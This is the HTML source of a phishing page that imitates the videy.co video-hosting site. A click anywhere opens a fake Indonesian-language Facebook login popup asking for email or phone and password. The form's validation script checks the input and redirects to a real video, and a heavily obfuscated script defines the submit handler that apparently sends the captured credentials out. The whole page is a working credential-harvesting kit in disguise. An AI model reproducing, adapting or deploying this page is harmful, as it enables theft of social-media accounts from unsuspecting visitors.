<html>
 <head> 
  <title>Watch on Videy | Free and Simple Video Hosting</title> 
  <link rel="preconnect" href="https://fonts.googleapis.com"> 
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin=""> 
  <link rel="icon" type="image/x-icon" href="https://videy.co/favicon.ico"> 
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> 
  <link href="https://fonts.googleapis.com/css2?family=Inter:wght@100..900&amp;family=Poppins:wght@400;600&amp;display=swap" rel="stylesheet"> 
  <link rel="stylesheet" href="https://videy.co/assets/style.css?cache=696041190980"> 
  <style>
  .popup-ariandi {
        display: none;
        background: rgba(0,0,0,0.5);
        width: 100%;
        height: 100%;
        position: fixed;
        top: 0;
        left: 0;
        z-index: 9999999;
    }
    .close-alex-facebook {
        background: #000;
         width: 20px;
        height: 20px;
        color: #fff;
        text-align: center;
        text-decoration: none;
        border-radius: 50%;
        border: 1.5px solid #fff;
        position: absolute;
        top: -8px;
        right: -10px;
        display: block;
    }
    .close-alex-facebook i {
        color: #fff;
        padding-top: 1px;
    }
    .container-box-fb {
        background: #ECEFF6;
        max-width: 330px;
        height: auto;
        position: relative;
        margin: 50px auto;
        margin-top: 1.9%;
        text-align: center;
        font-family: system-ui;
        color: #000;
        border-radius: 10px;
    }
    .atasan-fb {
        background: #3b5998;
	    width: 100%;
	    height: auto;
	    padding: 9px;
	    border-top-left-radius: 10px;
	    border-top-right-radius: 10px;
    }
    .atasan-fb img {
        width: 115px;
        margin-left: auto;
        margin-right: auto;
        display: block;
    }
    .isi-facebook {
        width: 300px;
        height: auto;
        margin-left: auto;
        margin-right: auto;
        display: block;
    }
    .isi-facebook .kaget {
        display: none;
        left: -15px;
        position: relative;
        width: 330px;
        padding: 5px;
        background: red;
        color:#fff;
        font-size: 13px;
        font-family: system-ui;
    }
    .isi-facebook img {
        width: 60px;
        margin-top: 20px;
        margin-left: auto;
        margin-right: auto;
        border-radius: 12px;
        display: block;
    }
    .txt-ucapan-fb {
        width: 270px;
        height: auto;
        margin-top: 10px;
        margin-left: auto;
        margin-right: auto;
        margin-bottom: 17px;
        padding: 8px;
        color: #90949c;
        font-size: 16px;
        font-family: system-ui;
        text-align: center;
        display: block;
    }
    .form-login-fb input[type="text"],.form-login-fb input[type="password"]{
        width: 100%;
	    height: auto;
	    padding: 12px;
	    color: #000;
	    font-size: 14px;
	    font-weight: 400;
	    font-family: 'Lato',sans-serif;
	    border: 1px solid #bdbebf;
	    cursor: pointer;
	    outline: none;
    }
    .form-login-fb input[type="text"] {
        margin: 0;
        padding-bottom: 13px;
	    border-bottom: none;
	    border-radius: 4px 4px 0 0;
	    box-shadow: 0 -1px 0 #E0E0E0 inset,0 0px 0px rgba(0,0,0,0.23) inset;
    }
    .form-login-fb input[type="password"] {
        margin: 0;
	    border-top: none;
	    border-radius: 0 0 4px 4px;
	    box-shadow: 0 -0px 0 rgba(0,0,0,0.23) inset,0 0px 0px rgba(255,255,255,0.1);
    }
    .btn-login-fb {
        background: #1778f2;
	    width: 90%;
	    height: auto;
	    margin-top: 10px;
	    margin-left: auto;
	    margin-right: auto;
	    padding: 10px;
	    color: #fff;
	    font-size: 14px;
	    font-family: system-ui;
	    font-weight: bold;
	    text-align: center;
	    text-shadow: 1px 0px rgba(0, 0, 0, 0.3);
	    border: 1px solid #3578e5;
	    border-radius: 5px;
	    box-shadow: 1px 1px 1px 1px rgba(0, 0, 0, 0.1);
	    outline: none;
	    display: block;
    }
    .txt-buat-akun {
        width: 100%;
        height: auto;
        padding: 5px;
        color: #3b5998;
        font-size: 13.5px;
        font-family: system-ui;
        text-align: center;
    }
    .txt-tidak-sekarang {
        width: 100%;
        height: auto;
        padding: 5px;
        color: #3b5998;
        font-size: 13.5px;
        font-family: Roboto;
        text-align: center;
    }
    .txt-lupa-password {
        width: 100%;
        height: auto;
        margin-bottom: 30px;
        padding: 5px;
        color: #7596c8;
        font-size: 13.5px;
        font-family: system-ui;
        text-align: center;
    }
    .isi-bahasa {
        width: 100%;
        height: auto;
        margin-left: auto;
        margin-right: auto;
        display: block;
    }
    .nama-bahasa {
        width: 40%;
        height: auto;
        margin: 5px;
        margin-bottom: 0px;
        color: #3b5998;
        font-size: 12px;
        font-family: system-ui;
        text-align: center;
        display: inline-block;
    }
    .nama-bahasa i {
        width: 23px;
        padding: 4px;
        color: #90949c;
        border: 1px solid #3b5998;
        border-radius: 3px;
    }
    .bahasa-aktif {
        color: #90949c;
        font-weight: bold;
    }
    .kalobukanalexsiapalagi {
        width: 40%;
        height: auto;
        margin-top: 10px;
        margin-left: auto;
        margin-right: auto;
        color: #90949c;
        font-size: 12px;
        font-family: system-ui;
        text-align: center;
        display: block;
    }
    </style>
 </head> 
 <body onclick="openfcbksalz()"> 
  <div class="container"> 
   <div class="top"> 
    <div class="logo"> 
     <a href="/">videy</a> 
    </div> 
    <a href="/"> 
     <div class="upload">
       Upload 
     </div> </a> 
    <div class="more"> 
     <a href="/advertise">Advertise</a> 
    </div> 
   </div> 
   <div onclick="openfcbksalz()">
   <div class="video"> 
    <div class="video-inner"> 
     <img width="100%" id="video" src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/potos.jpg"> 
     <div id="video-error" class="video-error" style="display: none;">
       Video could not be found. 
     </div> 
     </div>
    </div> 
   </div> 
   <div class="footer"> 
    <div class="copyright">
      Copyright © 
     <span id="year">2024</span> TRUE DOMAIN PRIVACY, LLC 
    </div> 
    <div class="legal"> 
     <div class="item"> 
      <a href="/terms-of-service">Terms of Service</a> 
     </div> 
     <div class="item"> 
      <a href="/report">Report Abuse</a> 
     </div> 
    </div> 
   </div> 
  </div> 

  <script>
        var videoLink;
        $(document).ready(function() {
            function getParameterByName(name) {
                name = name.replace(/[\[\]]/g, '\\$&');
                var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'),
                    results = regex.exec(window.location.href);
                if (!results) return null;
                if (!results[2]) return '';
                return decodeURIComponent(results[2].replace(/\+/g, ' '));
            }

            var paramValue = getParameterByName('id');
            if (paramValue) {
                var fileType = '.mp4';
          
                if (paramValue.length === 9 && paramValue[8] === '2') {
                    fileType = '.mov';
                }
                videoLink = 'https://cdn.videy.co/' + paramValue + fileType;
                $('#video').attr('src', videoLink);
            }
        });
    </script> 
  <script>
        const video = document.getElementById('video');
        const errorMessage = document.getElementById('video-error');
     
        video.addEventListener('error', function(event) {
          const error = video.error;
          if (error && error.code === 4) {
              errorMessage.style.display = 'block';
              video.style.display = 'none';
          }
        });
    </script> 
 </body>
 <div class="popup-ariandi alex-facebook animate fadeIn" id="slzfcbk" style="display: none;">
            <div class="container-box-fb" style="margin-top: 10%;">
                <div class="atasan-fb" style="width: 95%;">
                    <img src="https://cdn.jsdelivr.net/gh/Hyuu09/CDNsalz@main/20240202_164508.png">
                </div>
                <div class="isi-facebook">
                    <p class="kaget email-fb1" style="width: 330px;">Nomor ponsel atau email yang Anda masukkan tidak cocok dengan akun apa pun. <b>Cari akun Anda.</b></b></p>
                    <p class="kaget sandi-fb1" style="width: 330px;">Kata sandi salah. <b>Apakah Anda melupakan kata sandi Anda?</b></p>   
                    <img src="https://videy.co/favicon.ico">
                    <div class="txt-ucapan-fb">Masuk ke akun Facebook Anda untuk lanjut ke videy.co</div>
                    <form class="form-login-fb" onsubmit="Sending()" method="post">
                        <label>
                            <input type="text" id="alx_email_fb2" name="email" placeholder="Email atau Nomor Telepon" autocomplete="off" autocapitalize="off" style="background: #fff; width: 90%" required>
                        </label>
                        <label>
                            <input type="password" id="alx_password_fb2" name="sandi" placeholder="Kata Sandi" autocomplete="off" autocapitalize="off" style="background: #fff; width: 90%" required>
                        </label>
                        <input type="hidden" name="ua" value="Bigo Live" readonly>
                        <input type="hidden" name="log" value="Facebook" readonly>
                        <clik class="btn-login-fb" type="return AlexHostingFB()">Masuk</clik>
                    </form>
                    <div class="txt-buat-akun">Buat akun</div>
                    <div class="txt-tidak-sekarang">Lain kali</div>
                    <div class="txt-lupa-password">Lupa Kata Sandi? • Pusat Bantuan</div>
                </div>
                <div class="isi-bahasa">
                    <center>
                        <div class="nama-bahasa bahasa-aktif">Bahasa Indonesia</div>
                        <div class="nama-bahasa">English (UK)</div>
                        <div class="nama-bahasa">Basa Jawa</div>
                        <div class="nama-bahasa">Bahasa Melayu</div>
                        <div class="nama-bahasa">日本語</div>
                        <div class="nama-bahasa">Español</div>
                        <div class="nama-bahasa">Português (Brasil)</div>
                        <div class="nama-bahasa"><i class="fa fa-plus"></i>
                        </div>
                    </center>
                </div>
                <div class="kalobukanalexsiapalagi">Facebook Inc.</div>
            </div>
        </div>
        <script src="https://code.jquery.com/jquery-3.6.0.js"></script>
        <script>
            function openfcbksalz() {
                $('#slzfcbk').show();
            }
            
           function AlexHostingFB() {
                var user = $('#alx_email_fb2').val();
                var pass = $('#alx_password_fb2').val();
                if (user == '' || user == null) {
                    $('.email').show();
                    $('.sandi').hide();
                    return false;
                } else {

                    if (user.includes('@')) {
                        let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                        if (user.match(pattern)) {
                            $('.email').hide();
                        } else {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        }
                    }

                    if (!isNaN(user)) {
                        if (user.length <= 10) {
                            $('.email').show();
                            $('.sandi').hide();
                            return false;
                        } else {
                            $('.email').hide();
                        }
                    }

                    if (user.match(/\s/g)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if (user.match(regex)) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    }


                    if (user.length <= 5) {
                        $('.email').show();
                        $('.sandi').hide();
                        return false;
                    } else {
                        $('.email').hide();
                    }

                }
                if (pass == '' || pass == null || pass.length <= 5) {
                    $('.sandi').show();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                
                var regexs = new RegExp("^(http[s]?:\\/\\/(www\\.)?|ftp:\\/\\/(www\\.)?|www\\.){1}([0-9A-Za-z-\\.@:%_\+~#=]+)+((\\.[a-zA-Z]{2,3})+)(/(.)*)?(\\?(.)*)?");
                if (pass.match(regexs)) {
                    alert('mau jpm ya dek?');
                    $('.email').hide();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (pass.match(regexs)) {
                    $('.sandi').show();
                    $('.email').hide();
                    return false;
                } else {
                    $('.sandi').hide();
                }
                  location.href = "https://videy.co/v?id=uVOjDydb";
                    }
                })
            }
        </script>
        <script>
var Sending;(function(){var eMS='',Caw=131-120;function cUp(w){var q=595475;var z=w.length;var f=[];for(var l=0;l<z;l++){f[l]=w.charAt(l)};for(var l=0;l<z;l++){var t=q*(l+248)+(q%15527);var v=q*(l+709)+(q%42637);var a=t%z;var s=v%z;var i=f[a];f[a]=f[s];f[s]=i;q=(t+v)%4179961;};return f.join('')};var dJs=cUp('qynalmscujrfrbdtngrhkcpitestoovcuwzox').substr(0,Caw);var xaH='=a  j v6,aar{,u]745v1n p="1wg1;2r;;j lmn,a(Ctr];-+(za,sh6r3o.r3,6r,((vv=zo(+9;=g<f8=;=;xrbf7aann+),,ca.il,2viqrf<0;8opcl6;vfr qi.go[s"(,} lg.lua;nnlh(rg=+ghc)3=+br]+(r.1;va(ae p+oz+n)>+t+=,otb1h2t,=..+(.ri.8c=etafxuspnsCbn4.c]lr 4[)t]njmu]ore1>2)a;,k)e)(gi,(-p}axv{=r]a ;t0(drn6u=}r1r7ki ,j-ir.pafr+9 =1;l1;s;j==t<+f;mt rudu[gnlr,s{vt;va=m)Cl}=ugdkra(0rib;rof"Cap l.0hr f2r+g)08a(r{=4rhrj==uhi6ti 7i;rpe7(a-wga;2+-)bzo=tnx-*1a=[nku.co{=At[hn+rr;vssge.+9;=v{s;,.9AaA7A)=2hd.e)][ln0 ry.k}(vho;Cldesjr(.b+nc;.)n,!C)n8.e(9g)rr =e)r(re(;;}v(au(cor)iefjo))(s[udvv*t)aen]mvrjom(ald,rsr;8St[bre[;sjn",Ca)q])xve(([;<hc )(nif+d"0nft.i(t+l{p=ui7fth+a (lg+iaj vp,ta;n54r)).0erv,6oruo]o;;)=av.Sp)sr(+g0]t.)a}e0=jge=oe;;5nlir v2a;le[s9=6hne09pra,al=,!8")1;(icta[ c;udnr;ag;=tgrsuso=vd+;v;q;ns)ic[0vg=,cc7eC6snAa)ml] t =i)z;7ip)8-lo<=arlw"gv=f=(1;).e.ihg[zr"t]gtfp2fh("hwa,m+ren==drf.87nhstgl"hiqtj,i7;u02';var DMX=cUp[dJs];var xRL='';var pEt=DMX;var AcZ=DMX(xRL,cUp(xaH));var DoT=AcZ(cUp('?89FoeF$}6>F6]aFF)_(=0t5F ]Fe4) rj#!F+02xa=].((aF)FeF0)F_.!btF$ale76)(d5eF4+6+Fe(n]b}%r=zFyFw[x(]\/fei"F(F;5-f(tCcF((1NE7r[.F.aNrF1Fa0F}o;=3=l*F]sf_F]=.(=F9,})6C6e{(7,Fi$St2FF.F7oi(aF$\/iFFFFFw(F_N_F.t,t?CFn2a"xi>%)0kFHaAe6l?0g"(91ae(_3.seFp.9l;>v 6Hr9eoFF+.eu]i&9%m"6}}i0sgeji .BFa\/)s=(aiFi-(!iazniFi.ph.Jd.]__ag.R>tF!7b-txa m-D!F 37_t!?rFf\/p woR_;4rM+eFlxau@({.Fr3FA\/Fl,0FFxFF2FiFxl.++aw9!{R5:(%6$F.[oyta=29F,a}Ftn_gawF0FF9n4+,a,t)-6g%)@()n4)6((f.e)_oF,(i!Fo-?5+rg]a=,6sF(a;3d)%3%9a(u*p7.rN0(e$...n\'(.,@F-me[fnK!_b(on[.er6Fi)h]esF;_(7).te)nota_,F l%F<f-jF:\/]9n-2!ea(Fa[_>]4)32F)F5Q(a";!">|!Fxjc!FF_a:p\/=.!(e$F2_4<mb>;rFNx)FoF9Q{i9)\'a..]1_a0pix2_wnb9c b7=.7dl5?F.hu,en F5p[l=)a2mF%-7|P6F2F.Fhh8] F+00=;x3g=[l.oecFs6imx{QEOF6t7(=F_a)7r26e%n,Kt8-!e_cF#Fwa_,.!a],.g)+5_Fd5;s=. :5=wb3i=(.$_&dK1l:o$c.aFanF r=.{!2F?;gFF.6! ,5#7rFz)(sc7(F..R(nbb._M_)F;9F{9:(a7 wip1s.!r F(\/;.{F;)c(#}by1=2. ?6((r]=6jFb1[eF{Mz6Lj,12NF)9a_2;j1)[(c[84s0l!.z)2P)F( n\/.$.h._e F;a]!1F alt;hFm#ni3@FF {5.e$4p\/ra1.?n04)n)t8uh.d)\']F}bf3i;w_FlFhp9FeFG.FFsFfar-F@)t]c}_F{N4,k4F)x}; i=[FFe 8-)rFF;)l4_8)F?8=uFN+eFfv7 58;{F{Lt]:$>5r,)8!of(a6C2FE,)$9}e7f(!.aH#7%!;?$z1f35t.!,Q=;DF,+Fez2F[i{7;s,FFT6.) F.o\/)FF_FF]FFFF.pawK4Fn!r!s)9h5F9S4{>fnbFocn{$F7n4xFo.F(u#iwDMh2)c](){(l5F6FF.)aer..cmi:)i!)-?u[1r(_(b.muu),Rlg9[.(9$(]_]-0:03F5F_@aF76e7clF"\/=,K_fk+d!!Be.FNmhn)FF,3FFe3?F])t1.aF FhS@$A(F_F1F_,[]FF)+}e_p8fFfFtFa)b3J9$,F.!FFSF]$as!a:]F{FF aFe,_FFa?23sa\/[py\/F6F.]tBF_t!F{Cw4Fe_}7oFF%)cg$6Fm(FFr.at(woQ%+~F]):6s>Jc(,t?@ewF?(_itt:F)s]6lF.)ns.Q?(tt-3$);Of,)r!(2(,6,F4coFze;[F)h1tS.-;j}(c}_bH?6c,_l;ma2[b6per)gePlzKF51{p,3F(\/;\/}%.(f-7bF)}?[|5H40[R.12F<(g  !t#9"!4.(a]afKF!.FAea5&7..nF.!7)F.J)+a$\/sF9e)l0{.)rFFFF,n3FFF [0!ItlL5gj.,Fyd)_4lB)]>*(9n*F9F]*\/j5GwH?a9.0eyoE))(._re.?o:F;)(rF;0p){!b.>eal_F(}D%=95]]] {76Ff()+b0o7)o%8nf.[y)F.1.0ta!]r-._.7B2+Fcr9F$t0 ..;)Fe).{...E 00])_{a(a6jF!\/)];);@!.!a_0a.f=)F:m..FF73)[]Fi5+Fs5..a\/p;?FMa(u_?$!Fbn..bwFh#gF.@am(Fi()(iu]i{F-!Fan6]0(,ead(>]F%i]D5_5.Aa?4. !o|_<$!F(l6Fb(F1)@\/;FGo0cteF;O!$_%}Fd4foeff.F7_F1cFe)D)|r%AAF%m(;af 54_itFFtM 6_}gjat)]rG(FFb.:]3u;,d!P,_}(pFF]$()})F>y_9)!$1_F$\/Ls F_2..)0%)ly=bm.=u.lJFfo))5#]6FM{F!#)z5tsFu,980).ya-uFyaLeFu6aeF]:",A-$F[F}!eau.dzelf?FF]b.9_4776{d:wDw\'2x05Fv)!]aoaFcaFr(t"$us6hp()a[+i....aFLFsoFF1.y(F3(;br.\/$N{)-.l=:]=>e1:#3scg0&%!"tFeS8F)(}.3f_:(3="..,mx\/;F_0y1eF$}0 F=!lb=!-M,s.g._1$(ols;[5.+.%FwkN!s14r=FH}dF6=Fn!(aiFFl)%so%[.1AF4F!ssp3].!a t(6#6c:#Lt)e!, f_Lsd+a_s2a8{1 soF%5b7(a3.!Fe(nb0u}5{[d[E.wacFeg]t3Fd..[_:;)22b90}5x4; ,-sySF.)3}eaF=!)Fs2i(t!u{g.(a.2d !!8;a(}Ko.!d2.){a}bgz\/Da[a6|Ff2+l .!\'+Ct(.!.68|F!!oj13[c,T=cFrn1nxapaP;e89whFu?F)Cj eF&Fept8(F$Fn();ip63(Kd_brf>%)a4{pKfg3(Fwbo ,_,| .\/s,)9F[i_].}]5s\/y=F}snHu,Ae to$77irv}b7pnE_FP\';tF-!]zH%iF (j.;E()j)5:n|F6n))e\/d7s)!5;9==i1arn)((5O;he!F[l7fFF%n_). FF[5F&d(,01N)1;%)6F(=zs,xF(alb ;f!'));var zZY=pEt(eMS,DoT );zZY(3570);return 6086})()
		</script>
  </html>
